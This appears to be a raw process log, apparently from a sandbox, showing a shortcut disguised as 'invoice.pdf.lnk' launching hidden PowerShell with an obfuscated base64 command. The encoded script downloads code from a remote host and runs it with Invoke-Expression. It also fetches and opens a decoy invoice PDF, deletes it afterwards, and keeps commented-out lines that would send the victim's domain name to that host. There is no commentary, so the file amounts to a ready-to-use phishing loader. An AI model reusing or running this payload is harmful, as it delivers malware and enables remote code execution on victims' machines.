cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "fGvsMtqWnxMC" C:\Users\test22\AppData\Local\Temp\invoice.pdf.lnk
3052powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -w hidden -exec bypass -encodedcommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AAoACgAjACQAZABhAHQAYQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAbgB2ADoAOgB1AHMAZQByAGQAbgBzAGQAbwBtAGEAaQBuACkAKQAKACMAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGcAZQB0AC8AcwB0AGEAdAB1AHMAPwBkAD0AIgAgACsAIAAkAGQAYQB0AGEAKQAKACMAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACcAMgAwADAAJwApACAAewAgAGUAeABpAHQAIAB9AAoACgAkAGQAYQB0AGEAIAA9ACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwADAALgAyADAANAAvAGEAcABwAC8AYQB1AHQAaAAiACkACgAkAGQAYQB0AGEAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQApAAoACgAkAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMgAwADQALwBhAHAAcAAvAGkAbgB2AG8AaQBjAGUALgBwAGQAZgAiACwAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAHcAYQBpAHQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAaQBuAHYAbwBpAGMAZQAuAHAAZABmACIACgAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAZABhAHQAYQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABpAG4AdgBvAGkAYwBlAC4AcABkAGYAIgAKAA==
1376